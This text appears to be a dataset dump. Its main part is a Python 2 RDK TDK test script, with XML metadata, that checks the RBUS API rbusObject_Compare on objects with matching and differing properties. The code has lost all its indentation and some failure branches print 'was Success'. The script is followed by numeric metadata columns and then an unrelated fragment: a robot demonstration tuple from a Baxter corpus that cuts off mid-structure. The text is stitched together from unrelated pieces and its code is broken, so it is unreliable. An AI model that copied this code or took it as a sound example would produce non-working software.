<status>FREE</status>
<!-- -->
<synopsis>To Validate the RBUS 2.0 API rbusObject_Compare by setting different properties for the RBUS Object</synopsis>
<!-- -->
<groups_id />
<!-- -->
<execution_time>15</execution_time>
<!-- -->
<long_duration>false</long_duration>
<!-- -->
<advanced_script>false</advanced_script>
<!-- execution_time is the time out time for test execution -->
<remarks></remarks>
<!-- Reason for skipping the tests if marked to skip -->
<skip>false</skip>
<!-- -->
<box_types>
<box_type>Broadband</box_type>
<!-- -->
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
<!-- -->
</rdk_versions>
<test_cases>
<test_case_id>TC_RBUS_67</test_case_id>
<test_objective>To Validate the RBUS 2.0 API rbusObject_Compare by setting different properties for the RBUS Object
</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1. CCSP components should be in a running state on the DUT
2. The TDK agent should be in a running state, or invoke it through the StartTdk.sh script
3. The DUT should be in RBUS mode</pre_requisite>
<api_or_interface_used>rbusObject_Compare
</api_or_interface_used>
<input_parameters>N/A</input_parameters>
<automation_approch>1. Open the RBUS connection using the rbus_open API
2. Initiate the RBUS value using rbusValue_Init and set a string value to it using the rbusValue_SetFromString API
3. Initiate the RBUS property using rbusProperty_Init with the rbus value from step 2 and release the RBUS value using the rbusValue_Release API
4. Repeat steps 2 and 3 for the Property 2 initialization.
5. Initiate 4 different objects (two parent objects and two child objects) using the rbusObject_Init API
6. Set the property for each object using the rbusObject_SetProperty API
7. The set-property combinations should be: (parent obj1, property1), (parent obj2, property2), (child obj1, property1) and (child obj2, property2)
8. Release the properties using the rbusProperty_Release API
9. Set the children on the objects using the rbusObject_SetChildren API; the combinations are (parent obj1, child obj1) and (parent obj2, child obj2)
10. Compare the objects using rbusObject_Compare; the return status should be success and the value should be zero
11. Initiate the rbus value again and set the same string value to it using the rbusValue_Init and rbusValue_SetFromString APIs
12. Initiate the property (prop 2) with a different property name using rbusProperty_Init and release the RBUS value using rbusValue_Release
13. Set the property for child object 2 with the new property using the rbusObject_SetProperty API
14. Release the RBUS property using rbusProperty_Release
15. Compare the objects again using rbusObject_Compare; the return value should be equal to -1.
16. Release all the objects using the rbusObject_Release API; the return status should be success
17. Close the RBUS connection using the rbus_close API</automation_approch>
<expected_output>rbusObject_Compare should return -1 for object with different properties</expected_output>
<priority>High</priority>
<test_stub_interface>rbus</test_stub_interface>
<test_script>TS_RBUS_Object_Compare_With_Different_Properties</test_script>
<skipped>No</skipped>
<release_version>M84</release_version>
<remarks>None</remarks>
</test_cases>
<script_tags />
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("rbus","1");
#IP and Port of box, no need to change;
#these will be replaced with the corresponding box IP and port while executing the script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_RBUS_Object_Compare_With_Different_Properties');
#Get the result of connection with test component and DUT
loadmodulestatus =obj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus ;
if "SUCCESS" in loadmodulestatus.upper() :
obj.setLoadModuleStatus("SUCCESS");
obj_name = "gTestObject"
prop_name = "gTestProp1"
print "\n********** Step 1: Open the RBUS connection ****************"
tdkTestObj = obj.createTestStep('RBUS_Open');
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
print "RBUS Open Detail is ",details
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Open the RBUS connection";
print "EXPECTED RESULT 1: rbus_open Should be success";
print "ACTUAL RESULT 1: rbus_open was success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
for count in range(1, 3):
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Init");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Initiate rbusValue_Init function";
print "EXPECTED RESULT 2: rbusValue_Init should be success";
print "ACTUAL RESULT 2: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
value_to_set = "string1"
print "Value to be set for RBUSValue is ",value_to_set
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusValue_SetFromString");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name",value_to_set);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 3: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 3: rbusValue_SetFromString was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
print "Initialize the Property prop%d with property name %s" %(count,prop_name);
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Init");
tdkTestObj.addParameter("prop_count",count);
tdkTestObj.addParameter("property_name",prop_name);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Validate rbusProperty_Init function";
print "EXPECTED RESULT 4: rbusProperty_Init should be success";
print "ACTUAL RESULT 4: rbusProperty_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Release");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 5: Initiate rbusValue_Release function";
print "EXPECTED RESULT 5: rbusValue_Release should be success";
print "ACTUAL RESULT 5: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 5: Initiate rbusValue_Release function";
print "EXPECTED RESULT 5: rbusValue_Release should be success";
print "ACTUAL RESULT 5: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Validate rbusProperty_Init function";
print "EXPECTED RESULT 4: rbusProperty_Init should be success";
print "ACTUAL RESULT 4: rbusProperty_Init was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 3: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 3: rbusValue_SetFromString was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Initiate rbusValue_Init function";
print "EXPECTED RESULT 2: rbusValue_Init should be success";
print "ACTUAL RESULT 2: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "\n *************** Start of RBUS Object Init Function **********************"
for count1 in range (1,5):
print "count1 is ",count1
if count1 == 1 or count1 == 2:
obj_name = "gTestObject1";
else:
obj_name = "gTestObject_ch1"
print "Initialize the RBUS Object obj%d with Object name %s" %(count1,obj_name);
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Init");
tdkTestObj.addParameter("obj_count",count1);
tdkTestObj.addParameter("object_name",obj_name);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 6: Initiate rbusObject_Init function";
print "EXPECTED RESULT 6: rbusObject_Init should be success";
print "ACTUAL RESULT 6: rbusObject_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 6: Initiate rbusObject_Init function";
print "EXPECTED RESULT 6: rbusObject_Init should be success";
print "ACTUAL RESULT 6: rbusObject_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Object Init Function **********************"
print "\n *************** Start of RBUS Object Set Property Function **********************"
for count2 in range (1,5):
print "Set the Property to the Object Obj%d" %count2
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_SetProperty");
tdkTestObj.addParameter("obj_count",count2);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 7: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 7: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 7: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 7: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 7: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 7: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Object Set Property Function **********************"
print "\n *************** Start of RBUS Property Release Function **********************"
for count3 in range (1,3):
print "Release the Property prop%d" %count3
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Release");
tdkTestObj.addParameter("prop_count",count3);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 8: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 8: rbusProperty_Release should be success";
print "ACTUAL RESULT 8: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 8: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 8: rbusProperty_Release should be success";
print "ACTUAL RESULT 8: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Property Release Function **********************"
print "\n *************** Start of RBUS Object Set Children Function **********************"
for count4 in range (1,3):
print "Set Children for the Object obj%d" %count4
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_SetChildren");
tdkTestObj.addParameter("obj_count",count4);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 9: Initiate rbusObject_SetChildren function";
print "EXPECTED RESULT 9: rbusObject_SetChildren should be success";
print "ACTUAL RESULT 9: rbusObject_SetChildren was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 9: Initiate rbusObject_SetChildren function";
print "EXPECTED RESULT 9: rbusObject_SetChildren should be success";
print "ACTUAL RESULT 9: rbusObject_SetChildren was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Property Release Function **********************"
comp_flag = 0;
print "\n *************** Start of RBUS Object Compare Function **********************"
print "Compare the Objects obj1 and obj2"
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Compare");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
compare_value = tdkTestObj.getResultDetails();
print "RBUS Object Compare details is ",compare_value
if expectedresult in actualresult and int(compare_value) == 0:
comp_flag = 1;
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 10: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 10: rbusObject_Compare should be success";
print "ACTUAL RESULT 10: rbusObject_Compare was Success, and value retrieved was zero";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 10: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 10: rbusObject_Compare should be success";
print "ACTUAL RESULT 10: rbusObject_Compare was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Object Compare Function **********************"
if comp_flag == 1:
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Init");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 11: Initiate rbusValue_Init function";
print "EXPECTED RESULT 11: rbusValue_Init should be success";
print "ACTUAL RESULT 11: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
value_to_set1 = "string1"
print "Value to be set for RBUSValue is ", value_to_set1
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusValue_SetFromString");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name",value_to_set1);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 12: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 12: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 12: rbusValue_SetFromString was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
print "\n********** Start of RBUS Property Init ****************"
prop_name1 = "gTestProp2"
print "Initialize the property prop2 with property name ",prop_name1
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Init");
tdkTestObj.addParameter("prop_count",2);
tdkTestObj.addParameter("property_name",prop_name1);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 13: Validate rbusProperty_Init function";
print "EXPECTED RESULT 13: rbusProperty_Init should be success";
print "ACTUAL RESULT 13: rbusProperty_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Release");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 14: Initiate rbusValue_Release function";
print "EXPECTED RESULT 14: rbusValue_Release should be success";
print "ACTUAL RESULT 14: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
print "Set the Property to Obj4 with Prop2 (with new values updated)"
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_SetProperty");
tdkTestObj.addParameter("obj_count",4);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 15: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 15: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 15: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "Release the Property prop2"
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Release");
tdkTestObj.addParameter("prop_count",2);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 16: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 16: rbusProperty_Release should be success";
print "ACTUAL RESULT 16: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "\n *************** Start of RBUS Object Compare Function **********************"
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Compare");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
neg_comp_value = tdkTestObj.getResultDetails();
print "RBUS Object Compare details is ",neg_comp_value
if expectedresult in actualresult and int(neg_comp_value) != 0:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 17: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 17: rbusObject_Compare should Not be equal to Zero";
print "ACTUAL RESULT 17: rbusObject_Compare value was not equal to Zero";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 17: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 17: rbusObject_Compare should Not be equal to Zero";
print "ACTUAL RESULT 17: rbusObject_Compare value was Equal to Zero";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print " *************** End of RBUS Object Compare Function **********************\n"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 16: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 16: rbusProperty_Release should be success";
print "ACTUAL RESULT 16: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 15: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 15: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 15: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 14: Initiate rbusValue_Release function";
print "EXPECTED RESULT 14: rbusValue_Release should be success";
print "ACTUAL RESULT 14: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 13: Validate rbusProperty_Init function";
print "EXPECTED RESULT 13: rbusProperty_Init should be success";
print "ACTUAL RESULT 13: rbusProperty_Init was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 12: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 12: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 12: rbusValue_SetFromString was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 11: Initiate rbusValue_Init function";
print "EXPECTED RESULT 11: rbusValue_Init should be success";
print "ACTUAL RESULT 11: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** Start of RBUS Property Release Function **********************"
for count5 in range (1,5):
print "Release the RBUS Object obj%d" %count5
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Release");
tdkTestObj.addParameter("obj_count",count5);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 18: Initiate rbusObject_Release function";
print "EXPECTED RESULT 18: rbusObject_Release should be success";
print "ACTUAL RESULT 18: rbusObject_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 18: Initiate rbusObject_Release function";
print "EXPECTED RESULT 18: rbusObject_Release should be success";
print "ACTUAL RESULT 18: rbusObject_Release was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Property Release Function **********************"
print "\n********** Start of RBUS Close ****************"
tdkTestObj = obj.createTestStep('RBUS_Close');
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
print "RBUS close Detail is ",details
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 19: Close the RBUS connection";
print "EXPECTED RESULT 19: rbus_close should be success";
print "ACTUAL RESULT 19: rbus_close was success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 19: Close the RBUS connection";
print "EXPECTED RESULT 19: rbus_close should be success";
print "ACTUAL RESULT 19: rbus_close was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "********** End of RBUS Close ****************"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Open the RBUS connection";
print "EXPECTED RESULT 1: rbus_open Should be success";
print "ACTUAL RESULT 1: rbus_open was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "********** End of RBUS Open ****************\n"
obj.unloadModule("rbus");
else:
print "Failed to load the module";
obj.setLoadModuleStatus("FAILURE");
print "Module loading failed";
| 57.644678
| 160
| 0.578585
| 3,620
| 38,449
| 6.055525
| 0.086188
| 0.031614
| 0.021349
| 0.024908
| 0.800283
| 0.779344
| 0.775375
| 0.758405
| 0.750103
| 0.728297
| 0
| 0.012292
| 0.331374
| 38,449
| 666
| 161
| 57.731231
| 0.8404
| 0.084528
| 0
| 0.773756
| 0
| 0
| 0.348916
| 0.042586
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002262
| null | null | 0.432127
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 9
| 40d0362d4950a0645b84787b037c6a308b94b5c9
| 20,820
| py
| Python
| copct-master/baxter_corpus/demo_swap_red_with_green_2.py
| jhomble/electron435
| 2a94a901679a1ebbdeea01bb9e888d365d536bec
| ["MIT"] | 4
| 2016-10-26T13:58:44.000Z
| 2018-11-13T13:03:52.000Z
| copct-master/baxter_corpus/demo_swap_red_with_green_2.py
| jhomble/electron435
| 2a94a901679a1ebbdeea01bb9e888d365d536bec
| ["MIT"] | 4
| 2020-03-31T01:10:26.000Z
| 2020-03-31T03:06:28.000Z
| copct-master/baxter_corpus/demo_swap_red_with_green_2.py
| jhomble/electron435
| 2a94a901679a1ebbdeea01bb9e888d365d536bec
| ["MIT"] | 1
| 2020-03-03T06:22:08.000Z
| 2020-03-03T06:22:08.000Z
|
demo = (
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"move arm and grasp",
(
2.000000,
"dock-body",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"move grasped object",
(
2.000000,
"dock-case",
(
(1.000000, 0.000186, 0.000190, ),
(-0.000186, 1.000000, 0.000020, ),
(-0.000190, -0.000020, 1.000000, ),
),
(
(3.947806, ),
(-0.000092, ),
(0.001779, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"release",
(
